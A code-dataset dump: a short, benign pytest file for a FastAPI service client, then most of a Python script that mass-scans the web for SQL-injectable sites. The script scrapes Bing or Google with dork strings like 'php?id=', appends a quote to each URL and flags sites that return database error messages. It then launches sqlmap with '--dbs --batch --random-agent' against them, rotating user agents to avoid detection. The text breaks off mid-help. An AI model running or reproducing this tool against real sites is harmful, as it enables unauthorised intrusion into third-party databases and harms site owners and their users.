    """The client fetches running-service details for an arbitrary node uuid."""
    director_client: DirectorV0Client = minimal_app.state.director_v0_client
    node_uuid = str(uuid4())

    details = await director_client.get_running_service_details(node_uuid)

    assert mocked_director_service_fcts["get_running_service_details"].called
    assert details == fake_running_service_details
| 33.733624
| 127
| 0.71767
|
import json
import re
import urllib.parse
from collections import namedtuple
from pathlib import Path
from random import randint
from typing import Callable, List
from uuid import uuid4
import pytest
import respx
from fastapi import FastAPI, status
from models_library.services import ServiceDockerData, ServiceKeyVersion
from simcore_service_director_v2.models.schemas.services import (
RunningServiceDetails,
ServiceExtras,
)
from simcore_service_director_v2.modules.director_v0 import DirectorV0Client
@pytest.fixture(autouse=True)
def minimal_director_config(project_env_devel_environment, monkeypatch):
monkeypatch.setenv("DIRECTOR_ENABLED", "1")
monkeypatch.setenv("POSTGRES_ENABLED", "0")
monkeypatch.setenv("CELERY_ENABLED", "0")
monkeypatch.setenv("REGISTRY_ENABLED", "0")
@pytest.fixture
def mocked_director_v0_service_api(minimal_app, entrypoint, exp_data, resp_alias):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
respx_mock.get(
urllib.parse.unquote(entrypoint),
content=exp_data,
alias=resp_alias,
)
yield respx_mock
ForwardToDirectorParams = namedtuple(
"ForwardToDirectorParams", "entrypoint,exp_status,exp_data,resp_alias"
)
def _get_list_services_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_all_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=computational",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_computational_services",
),
ForwardToDirectorParams(
entrypoint="/v0/services?service_type=dynamic",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["service1", "service2"]},
resp_alias="list_dynamic_services",
),
]
def _get_service_version_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
exp_status=status.HTTP_200_OK,
exp_data={"data": ["stuff about my service"]},
resp_alias="get_service_version",
)
]
def _get_service_version_extras_calls() -> List[ForwardToDirectorParams]:
return [
ForwardToDirectorParams(
entrypoint="/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4/extras",
exp_status=status.HTTP_200_OK,
exp_data={"data": "extra stuff about my service"},
resp_alias="get_service_extras",
)
]
@pytest.mark.parametrize(
"entrypoint,exp_status,exp_data,resp_alias",
_get_list_services_calls()
+ _get_service_version_calls()
+ _get_service_version_extras_calls(),
)
def test_forward_to_director(
client, mocked_director_v0_service_api, entrypoint, exp_status, exp_data, resp_alias
):
response = client.get(entrypoint)
assert response.status_code == exp_status
assert response.json() == exp_data
assert mocked_director_v0_service_api[resp_alias].called
@pytest.fixture(scope="session")
def fake_service_details(mocks_dir: Path) -> ServiceDockerData:
fake_service_path = mocks_dir / "fake_service.json"
assert fake_service_path.exists()
fake_service_data = json.loads(fake_service_path.read_text())
return ServiceDockerData(**fake_service_data)
@pytest.fixture
def fake_service_extras(random_json_from_schema: Callable) -> ServiceExtras:
random_extras = ServiceExtras(
**random_json_from_schema(ServiceExtras.schema_json(indent=2))
)
return random_extras
@pytest.fixture
def fake_running_service_details(
random_json_from_schema: Callable,
) -> RunningServiceDetails:
random_data = random_json_from_schema(RunningServiceDetails.schema_json(indent=2))
KEYS_TO_FIX = ["published_port", "service_port"]
for k in KEYS_TO_FIX:
if k in random_data:
random_data[k] = randint(1, 50000)
random_details = RunningServiceDetails(**random_data)
return random_details
@pytest.fixture
def mocked_director_service_fcts(
minimal_app: FastAPI,
fake_service_details: ServiceDockerData,
fake_service_extras: ServiceExtras,
fake_running_service_details: RunningServiceDetails,
):
with respx.mock(
base_url=minimal_app.state.settings.director_v0.base_url(include_tag=False),
assert_all_called=False,
assert_all_mocked=True,
) as respx_mock:
respx_mock.get(
"/v0/services/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
content={"data": [fake_service_details.dict(by_alias=True)]},
alias="get_service_version",
)
respx_mock.get(
"/v0/service_extras/simcore%2Fservices%2Fdynamic%2Fmyservice/1.3.4",
content={"data": fake_service_extras.dict(by_alias=True)},
alias="get_service_extras",
)
pattern = re.compile(
r"v0/running_interactive_services/[0-9a-fA-F]{8}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{4}-?[0-9a-fA-F]{12}$"
)
respx_mock.get(
pattern,
content={"data": fake_running_service_details.dict(by_alias=True)},
alias="get_running_service_details",
)
yield respx_mock
async def test_get_service_details(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_service_details: ServiceDockerData,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service = ServiceKeyVersion(
key="simcore/services/dynamic/myservice", version="1.3.4"
)
service_details: ServiceDockerData = await director_client.get_service_details(
service
)
assert mocked_director_service_fcts["get_service_version"].called
assert fake_service_details == service_details
async def test_get_service_extras(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_service_extras: ServiceExtras,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service = ServiceKeyVersion(
key="simcore/services/dynamic/myservice", version="1.3.4"
)
service_extras: ServiceExtras = await director_client.get_service_extras(service)
assert mocked_director_service_fcts["get_service_extras"].called
assert fake_service_extras == service_extras
async def test_get_running_service_details(
minimal_app: FastAPI,
mocked_director_service_fcts,
fake_running_service_details: RunningServiceDetails,
):
director_client: DirectorV0Client = minimal_app.state.director_v0_client
service_details: RunningServiceDetails = (
await director_client.get_running_service_details(str(uuid4()))
)
assert mocked_director_service_fcts["get_running_service_details"].called
assert fake_running_service_details == service_details
| true
| true
|
790c9459fd20a479a63780067f6e8bbb4410f33b
| 30,755
|
py
|
Python
|
findsqlinj.py
|
ThomasTJdev/python_gdork_sqli
|
9f0254733601b5ead8799cbc8539fdf712db49b5
|
[
"MIT"
] | 58
|
2017-01-23T11:36:29.000Z
|
2022-02-20T16:53:25.000Z
|
findsqlinj.py
|
ThomasTJdev/python_gdork_sqli
|
9f0254733601b5ead8799cbc8539fdf712db49b5
|
[
"MIT"
] | 2
|
2017-01-26T15:14:46.000Z
|
2018-12-29T08:03:43.000Z
|
findsqlinj.py
|
ThomasTJdev/python_gdork_sqli
|
9f0254733601b5ead8799cbc8539fdf712db49b5
|
[
"MIT"
] | 33
|
2017-01-22T01:53:42.000Z
|
2021-12-13T20:47:20.000Z
|
#!/usr/bin/python python3
#
# Python script for finding websites which are prone to SQL injections
# Do crawling on bing or google for possible vuln urls
# Check url with quote ' and catch error messages
# Run sqlmap against urls
#
# License:
# MIT - (c) 2016 ThomasTJ (TTJ)
#
import sys # Quit the shiat
import os # Working with files and starting sqlmap
import re # Searching web results for vuln
import requests # Calling websites
import urllib.parse # Parsing url encoding for search
import shutil # Checking if SQLmap is installed
import psutil # Checking possible VPN connection
import http.client # Ping to check network connection
import random # Shuffle between user agents
import time # Printing time when scraping and checking urls
from time import sleep # Multiple use cases, e.g. sleep between requests
from bs4 import BeautifulSoup # Working with website date
class bcolors:
    """ANSI escape sequences used to colorize terminal output."""
    HEADER = '\033[95m'  # bright magenta
    OKBLUE = '\033[94m'  # bright blue
    OKGREEN = '\033[92m'  # bright green
    WARNING = '\033[93m'  # bright yellow
    FAIL = '\033[91m'  # bright red
    ENDC = '\033[0m'  # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    ITALIC = '\x1B[3m'
# Module-level state shared between the menu (startpage) and the workers.
# "0" is a sentinel meaning "no filename stored from a previous step yet".
filenameRawUrl = "0"
filenameVulnUrl = "0"
def LoadUserAgents(uafile="user_agents.txt"):
    """Load user-agent strings from *uafile* and return them shuffled.

    uafile: path to a text file of user agents, one per line. The file is
    read in binary mode, so the returned entries are bytes objects.
    """
    uas = []
    with open(uafile, 'rb') as uaf:
        for ua in uaf.readlines():
            if ua:
                # NOTE(review): [1:-1-1] drops the first char and the last two
                # of the stripped line — presumably the file stores each agent
                # as a quoted, comma-terminated entry ("UA",). Confirm against
                # the actual user_agents.txt format before changing.
                uas.append(ua.strip()[1:-1-1])
    random.shuffle(uas)
    return uas
def inputSearchUrls():
    """Interactively collect search parameters, then hand off to the scraper.

    Prompts for the base search string, search engine, paging and pause
    settings, and an optional results file, then calls searchUrlForString().
    Invalid answers fall back to documented defaults instead of aborting.
    """
    print("\n" + bcolors.HEADER)
    print(" #===================================#")
    print(" # #")
    print(" # Find urls which might is vuln for #")
    print(" # SQL injections #")
    print(" # #")
    print(" #===================================#")
    print("\n" + bcolors.ENDC)
    print(" Basesearch could be: php?id=, php?cat=, e.g.\n")
    # =================================
    # Base input
    # =================================
    # @type basesearch: str
    # @param basesearch: Query string. Must NOT be url-encoded.
    basesearch = input(" Enter base search string: " + bcolors.OKBLUE)
    # @type searchprovider: str
    # @param searchprovider: Who should perform the search ('b'ing or 'g'oogle).
    searchprovider = input(bcolors.ENDC + " Bing or Google (b/g): " + bcolors.OKBLUE)
    if searchprovider.lower() not in ('b', 'g'):
        print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
        searchprovider = 'b'
    # @type maxperpage: int/str
    # @param maxperpage: Max results returned per page (str(..) applied below).
    maxperpage = input(bcolors.ENDC + " Results per page: " + bcolors.OKBLUE)
    if not maxperpage.isdigit():
        print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 20")
        maxperpage = 20
    # @type maxpages: int
    # @param maxpages: Max pages to loop through
    maxpages = input(bcolors.ENDC + " Number of pages: " + bcolors.OKBLUE)
    if not maxpages.isdigit():
        print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 10")
        maxpages = 10
    # @type startpage: int
    # @param startpage: First page to look in (1-based input, 0-based below).
    # NOTE(review): this local deliberately(?) shadows the module-level
    # startpage() menu function for the rest of this call.
    startpage = input(bcolors.ENDC + " Start pages: " + bcolors.OKBLUE)
    if not startpage.isdigit():
        print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
        startpage = 0
    if int(startpage) > 0:
        startpage = (int(startpage) - 1)
    # @type timeout: int
    # @param timeout: Sleep between requests, in seconds.
    timeout = input(bcolors.ENDC + " Enter pause between requests: " + bcolors.OKBLUE)
    if not timeout.isdigit():
        print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 6")
        timeout = 6
    # @type savesearch: str
    # @param savesearch: Save the results to a file ('y'/'n').
    savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
    if savesearch.lower() not in ('', 'y', 'n'):
        print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'n'")
        savesearch = 'n'
    # @type filename: str
    # @param filename: Filename for file containing the search results
    if savesearch.lower() == "y":
        filename = input(bcolors.ENDC + " Filename for search: " + bcolors.OKBLUE)
        if not os.path.isfile(filename):
            os.mknod(filename)
        else:
            appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
            if appendtofile == "n":
                print(bcolors.WARNING + " - User disallowed appending to resultfile")
                print(bcolors.WARNING + " - Please try again with another filename")
                print(bcolors.WARNING + " - Exiting")
                sys.exit()
    else:
        # NOTE(review): the empty-string assignment below is dead code — it is
        # immediately overwritten with the temporary filename "tmpurllist".
        filename = ""
        filename = "tmpurllist"
    # =================================
    # Make variables ready to use
    # =================================
    count = str(maxperpage)
    startpage = int(startpage)
    pages = (int(maxpages) + startpage)
    sleeptime = int(timeout)
    string = str(basesearch)
    stringurl = urllib.parse.quote_plus(string)
    print(bcolors.ENDC + "\n [*]:: Searching")
    print(bcolors.HEADER + bcolors.BOLD + "\n" + " [+] Results" + bcolors.ENDC)
    searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename)
def searchUrlForString(searchprovider, count, startpage, pages, sleeptime, string, stringurl, savesearch, filename):
    """Scrape Bing ('b') or Google ('g') result pages for urls containing
    *string*, optionally appending hits to *filename*, then offer to chain
    into checkUrlsForVuln().

    stringurl is the url-encoded form of string; count/startpage/pages drive
    the paging loop; sleeptime is the pause between requests.
    """
    # =================================
    # Loop through pages
    # =================================
    for start in range(startpage, pages):
        # try:
        # =========================
        # Bing search
        # =========================
        if searchprovider == "b":
            pagenr = int(start)*int(count)+1
            address = "http://www.bing.com/search?q=instreamset:(url title):" + stringurl + "&count=" + count + "&first=" + str(pagenr)
            print(" [*] Page number: " + str(int(start)+1))
            # Loading random useragent for each request
            uas = LoadUserAgents()
            ua = random.choice(uas)  # select a random user agent
            headers = {"Connection": "close", "User-Agent": ua}
            r = requests.get(address, headers=headers)
            soup = BeautifulSoup(r.text, 'lxml')
            # Bing result links live inside <h2><a href=...>
            for d in soup.find_all('h2'):
                for a in d.find_all('a', href=True):
                    if string in a['href']:
                        print(
                            bcolors.OKGREEN
                            + " ["
                            + time.strftime("%H:%M:%S")
                            + "] [+] " + a['href'] + bcolors.ENDC
                        )
                        if filename:
                            with open(filename, 'a') as file:
                                file.write(a['href'] + "\n")
                    elif "0.r.msn." in a['href']:
                        # Bing ad/redirect links — ignore
                        pass
                    else:
                        pass
            sleep(sleeptime)
        # =========================
        # Google search
        # =========================
        elif searchprovider == "g":
            pagenr = int(start)*int(count)
            address = "https://www.google.dk/search?q=" + stringurl + "&num=" + count + "&start=" + str(pagenr)
            # address = "https://www.google.dk/search?q=inurl%3A" + stringurl + "&num=" + count + "&start=" + str(pagenr)
            print(" [*] Page number: " + str(int(start)+1))
            # Loading random useragent for each request
            uas = LoadUserAgents()
            ua = random.choice(uas)  # select a random user agent
            headers = {"Connection": "close", "User-Agent": ua}
            r = requests.get(address, headers=headers)
            soup = BeautifulSoup(r.text, 'lxml')
            # Google shows the hit url inside <cite> elements
            for d in soup.find_all('cite'):
                url = d.text
                if string in url:
                    print(
                        bcolors.OKGREEN
                        + " ["
                        + time.strftime("%H:%M:%S")
                        + "] [+] " + url + bcolors.ENDC
                    )
                    # NOTE(review): this compares the FILENAME to "y" — the
                    # Bing branch uses `if filename:` and checkUrlsForVuln
                    # tests `savesearch == "y"`. Google hits are therefore
                    # only saved when the file is literally named "y";
                    # looks like a bug — confirm intent before fixing.
                    if filename == "y":
                        with open(filename, 'a') as file:
                            file.write(url + "\n")
            sleep(sleeptime)
        # NOTE(review): vestigial structure — the `# try:` above suggests this
        # handler once wrapped the whole loop body; as written it only guards
        # the no-op print below, so most errors in the branches are unhandled.
        try:
            print("")
        # =============================
        # Error, end, exit
        # =============================
        except KeyboardInterrupt:
            print(bcolors.FAIL + " User input - Ctrl + c" + bcolors.ENDC)
            quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
            if quitnow == "y":
                print(bcolors.ENDC + " // Exiting\n\n")
                sys.exit()
            else:
                print(bcolors.ENDC + " // Continuing\n\n")
        except:
            print(bcolors.FAIL + " ERROR!!! " + bcolors.ENDC)
    # =================================
    # Done - sum it up
    # =================================
    print("\n Done scraping")
    with open(filename) as f:
        resultsnumber = sum(1 for _ in f)
    if savesearch == "y":
        print(" Scraping saved in file: " + filename)
        print(" Total saved urls: " + str(resultsnumber))
    else:
        print(" Total urls collected: " + str(resultsnumber))
    # Check urls? Next function activates..
    checkurls = input(bcolors.ENDC + "\n Would you like to check urls for vuln (Y/n): " + bcolors.OKBLUE)
    if checkurls.lower() not in ('', 'y', 'n'):
        print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
        checkurls = "y"
    if checkurls == "n":
        print(bcolors.ENDC + " // Exiting\n\n")
        try:
            os.remove("tmpurllist")
        except OSError:
            pass
        sys.exit()
    else:
        checkUrlsForVuln(filename)
def checkUrlsForVuln(filenameRawUrl):
    """Probe each url in a list by appending a single quote and scanning the
    response for well-known database error strings (MySQL, MSSQL, Oracle,
    PostgreSQL). Hits can be saved and chained into scanUrlsSQLmap().

    filenameRawUrl: path of the url list from a previous run, or the
    sentinel "0" meaning "prompt the user for a file".
    """
    print("\n\n\n" + bcolors.HEADER)
    print(" #===============================#")
    print(" # #")
    print(" # Check if urls is vuln for #")
    print(" # SQL injection #")
    print(" # #")
    print(" #===============================#")
    print("\n" + bcolors.ENDC)
    # =================================
    # Base input
    # =================================
    # Reuse the file from a previous scrape if one is remembered
    if filenameRawUrl != "0":
        print(" Filepath from run is still in memory: " + filenameRawUrl)
        urlfileChoose = input(bcolors.ENDC + " (i)nput new filename, or (u)se from memory (i/U): " + bcolors.OKBLUE)
        if urlfileChoose not in ('i', 'u'):
            print(bcolors.WARNING + " - Using from memory")
            urlfileChoose = 'u'
        if urlfileChoose == 'u':
            urlfile = filenameRawUrl
        else:
            # @type urlfile: str
            # @param urlfile: File with the raw urls to check.
            urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
    else:
        # @type urlfile: str
        # @param urlfile: File with the raw urls to check.
        urlfile = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
    if not os.path.isfile(urlfile):
        print(bcolors.FAIL + " Specified file does not exist.")
        print(bcolors.FAIL + " Exiting")
        sys.exit()
    # @type verboseactive: str
    # @param verboseactive: Verbosity: "0" quiet, "1" counts, "2" matched text.
    verboseactive = input(bcolors.ENDC + " Verboselevel (0, 1, 2): " + bcolors.OKBLUE)
    if not verboseactive:
        print(bcolors.WARNING + " - Wrong input - only numeric values allowed. Using 0")
        verboseactive = "0"
    # @type savesearch: str
    # @param savesearch: Save the scan to file ('y'/'n').
    savesearch = input(bcolors.ENDC + " Save search (y/N): " + bcolors.OKBLUE)
    if savesearch.lower() not in ('', 'y', 'n'):
        print(bcolors.WARNING + " - Wrong input - only 'y' and 'n' allowed. Using 'y'")
        savesearch = 'y'
    # @type filename: str
    # @param filename: Result file; "0" sentinel when saving is disabled.
    if savesearch == "y":
        filename = input(bcolors.ENDC + " Filename for results: " + bcolors.OKBLUE)
        if not filename:
            print(bcolors.WARNING + " - Wrong input - using 'vulnurls' as filename")
            filename = "vulnurls"
        if not os.path.isfile(filename):
            os.mknod(filename)
        else:
            appendtofile = input(bcolors.ENDC + " File exists, append (Y/n): " + bcolors.OKBLUE)
            if appendtofile == "n":
                print(" User disallowed appending to resultfile")
                print(" Please try again with another filename")
                print(" Exiting")
                sys.exit()
    else:
        filename = "0"
    print(bcolors.ENDC + "\n [*]::Reading file\n")
    print(" [*] Connecting\n")
    # =================================
    # Loop through urls and add a qoute
    # =================================
    with open(urlfile) as fileorg:
        for line in fileorg:
            # Reset all error-string hit counters for this url
            checkMY1 = 0
            checkMY2 = 0
            checkMY3 = 0
            checkMY4 = 0
            checkMS1 = 0
            checkMS2 = 0
            checkMS3 = 0
            checkOR1 = 0
            checkOR2 = 0
            checkOR3 = 0
            checkPO1 = 0
            checkPO2 = 0
            try:
                # Get data: append a quote to trigger a syntax error server-side
                url = line + "'"
                print(
                    " ["
                    + time.strftime("%H:%M:%S")
                    + "] [*] " + line.strip('\n')
                )
                # Loading random useragent
                uas = LoadUserAgents()
                ua = random.choice(uas)  # select a random user agent
                headers = {"Connection": "close", "User-Agent": ua}
                r = requests.get(url, headers=headers)
                soup = BeautifulSoup(r.text, 'lxml')
                # Count occurrences of known DB error strings in the response.
                # MySQL
                checkMY1 = len(soup.find_all(text=re.compile('check the manual that corresponds to your MySQL')))
                checkMY2 = len(soup.find_all(text=re.compile('SQL syntax')))
                checkMY3 = len(soup.find_all(text=re.compile('server version for the right syntax')))
                checkMY4 = len(soup.find_all(text=re.compile('expects parameter 1 to be')))
                # Microsoft SQL server
                checkMS1 = len(soup.find_all(text=re.compile('Unclosed quotation mark before the character string')))
                checkMS2 = len(soup.find_all(text=re.compile('An unhanded exception occurred during the execution')))
                checkMS3 = len(soup.find_all(text=re.compile('Please review the stack trace for more information')))
                # Oracle Errors
                checkOR1 = len(soup.find_all(text=re.compile('java.sql.SQLException: ORA-00933')))
                checkOR2 = len(soup.find_all(text=re.compile('SQLExceptionjava.sql.SQLException')))
                checkOR3 = len(soup.find_all(text=re.compile('quoted string not properly terminated')))
                # Postgre SQL
                checkPO1 = len(soup.find_all(text=re.compile('Query failed:')))
                checkPO2 = len(soup.find_all(text=re.compile('unterminated quoted string at or near')))
                # Verbose level 1: print the raw hit counts
                if verboseactive == "1":
                    print(" [V] Check1 MySQL found: " + str(checkMY1))
                    print(" [V] Check2 MySQL found: " + str(checkMY2))
                    print(" [V] Check3 MySQL found: " + str(checkMY3))
                    print(" [V] Check4 MySQL found: " + str(checkMY4))
                    print(" [V] Check5 MS SQL found: " + str(checkMS1))
                    print(" [V] Check6 MS SQL found: " + str(checkMS2))
                    print(" [V] Check7 MS SQL found: " + str(checkMS3))
                    print(" [V] Check8 Oracle found: " + str(checkOR1))
                    print(" [V] Check9 Oracle found: " + str(checkOR2))
                    print(" [V] Check10 Oracle found: " + str(checkOR3))
                    print(" [V] Check11 Postgre found: " + str(checkPO1))
                    print(" [V] Check12 Postgre found: " + str(checkPO2))
                # Verbose level 2: print the first matched text fragment
                if verboseactive == "2":
                    checkverMY1 = soup.find(text=re.compile('check the manual that corresponds to your MySQL'))
                    checkverMY2 = soup.find(text=re.compile(r'SQL syntax'))
                    checkverMY3 = soup.find(text=re.compile(r'server version for the right syntax'))
                    checkverMY4 = soup.find(text=re.compile('expects parameter 1 to be'))
                    print(" [V] Check1 MySQL found: " + str(checkverMY1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check2 MySQL found: " + str(checkverMY2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check3 MySQL found: " + str(checkverMY3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check4 MySQL found: " + str(checkverMY4).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    checkverMS1 = soup.find(text=re.compile('Unclosed quotation mark before the character string'))
                    checkverMS2 = soup.find(text=re.compile('An unhanded exception occurred during the execution'))
                    checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
                    print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
                    checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
                    checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
                    print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    checkverPO1 = soup.find(text=re.compile('Query failed:'))
                    checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
                    print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                    print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
                # If any counter is non-zero the url is flagged.
                # NOTE(review): the final operand is bare `checkPO2` (no `> 0`);
                # equivalent here since counts are non-negative ints.
                if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
                    print(
                        bcolors.OKGREEN
                        + "\n"
                        + " Possible vuln url!"
                        + "\n"
                        + " ["
                        + time.strftime("%H:%M:%S")
                        + "] [+] "
                        + line + bcolors.ENDC
                        + "\n"
                    )
                    if savesearch == "y":
                        with open(filename, 'a') as file:
                            file.write(line)
                else:
                    print(
                        bcolors.WARNING
                        + " ["
                        + time.strftime("%H:%M:%S")
                        + "] [-] " + line + bcolors.ENDC
                    )
            # Skip X or/and exit
            except KeyboardInterrupt:
                print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
                quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
                if quitnow == "y":
                    print(bcolors.ENDC + " // Exiting\n\n")
                    try:
                        os.remove("tmpurllist")
                    except OSError:
                        pass
                    sys.exit()
                else:
                    print(bcolors.ENDC + " // Continuing\n\n")
            # Bad X: any other failure (network, parse, ...) just skips the url
            except:
                print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
    # =================================
    # Done - sum it up
    # =================================
    print("\n Done scanning urls")
    if savesearch == "y":
        with open(filename) as f:
            resultsnumber = sum(1 for _ in f)
        print(" Scraping saved in file: " + filename)
        print(" Total saved urls: " + str(resultsnumber))
        if resultsnumber == 0:
            print(" No vuln urls, exiting\n\n")
            try:
                os.remove("tmpurllist")
            except OSError:
                pass
            sys.exit()
    checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
    if checkurls == "y":
        try:
            os.remove("tmpurllist")
        except OSError:
            pass
        scanUrlsSQLmap(filename)
    else:
        print(bcolors.ENDC + " // Exiting\n\n")
        try:
            os.remove("tmpurllist")
        except OSError:
            pass
        sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
    """Hand a list of candidate urls over to sqlmap for bulk scanning.

    filenameVulnUrl: path of the url list, or the sentinel "0" meaning
    "no filename in memory — prompt the user for one". If sqlmap is not
    installed, only the command the user should run is printed.
    """
    print("\n\n\n" + bcolors.HEADER)
    print(" #===============================#")
    print(" # #")
    print(" # Scan urls with #")
    print(" # SQLmap #")
    print(" # #")
    print(" #===============================#")
    print("\n" + bcolors.ENDC)
    # =================================
    # Check if sqlmap installed, file, etc.
    # =================================
    if shutil.which('sqlmap') is None:
        print(" SQLmap is not installed on system - can't go on.")
        print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
        print(" \nCommand:")
        # BUGFIX: the closing double quote of the -m argument was missing,
        # so the printed command could not be copy-pasted into a shell.
        print(" sqlmap -m \"" + filenameVulnUrl + "\"\n")
    else:
        if filenameVulnUrl == "0":
            print(" No filename in memory, please specify.")
            # @type filenameVulnUrl: str
            # @param filenameVulnUrl: File with the urls to scan.
            filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
            if not os.path.isfile(filenameVulnUrl):
                print(bcolors.FAIL + " Specified file does not exist.")
                print(bcolors.FAIL + " Exiting")
                sys.exit()
        print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
        fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
        command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
        print("Command to execute: " + command)
        input(bcolors.ENDC + " Press enter to continue\n")
        print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
        print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
        # RUN SQLMAP !!
        os.system(command)
    # Not implemented - specify saving destination
    # @type savingplace: str
    # @param savingplace: Who should perform the search.
    # savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
    # if savingplace not in ('b', 'g'):
    # print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
    # savingplace = 'b'
def helpme():
    """Print the banner and usage walkthrough for the three menu actions,
    then exit the program."""
    print("\n\n" + bcolors.HEADER)
    print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
    print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
    print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
    print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
    print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
    print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
    print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
    print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
    print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
    print("\n\n" + bcolors.ENDC)
    print(" This python script is developed to show, how many vulnerables websites,")
    print(" which are laying around on the web. The main focus of the script is to")
    print(" generate a list of vuln urls. Please use the script with causing and")
    print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
    print(" just for showcasing.")
    print("")
    print(" The script is divided into 3 main sections.\n")
    print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
    print(" In this section you have to provide a search string, which 'connects' to")
    print(" the websites database, e.g. 'php?id='. The script then crawls")
    print(" Bing or Google for urls containing it. All of the urls can then be saved")
    print(" into a file. (Please be aware that you might get banned for crawling to")
    print(" fast, remember an appropriate break/sleep between request).")
    print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
    print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
    print("")
    print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
    print(" This section adds a qoute ' to the websites url. If the website is")
